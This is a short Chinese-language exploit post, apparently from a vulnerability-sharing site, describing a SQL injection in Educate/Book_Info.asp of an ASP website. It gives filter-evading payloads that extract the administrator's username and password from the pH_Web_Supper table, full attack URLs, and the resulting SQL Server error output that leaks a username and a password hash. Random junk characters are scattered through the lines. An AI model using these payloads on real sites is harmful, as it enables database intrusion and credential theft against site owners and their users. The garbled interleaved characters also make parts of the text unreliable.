漏洞出现在Educate/Book_Info.asp
) S* P b2 M9 }, }0 h$ P此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出' ~8 K+ m0 m/ A% ^6 j
exp:如下+ s& y1 y' U5 ?' o8 ~
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& t% t: ~/ ^/ _查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
- ?5 Q% l" L& g: P/ l! Bhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper). p3 p& q7 O9 N3 Y
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'2 d. r. m% F2 ?. T; J; g+ n
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
3 R1 K( B5 y6 ]+ B+ `. ?" p0 Y/Educate/Book_Info.asp,行 8% B0 Y& ~6 l7 }
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
. L [* J5 h4 W+ e: D3 Y% q. YMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'0 Q9 T4 z% {) |! |
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
, i6 i# r2 i; k" P9 f5 O/Educate/Book_Info.asp,行 8 |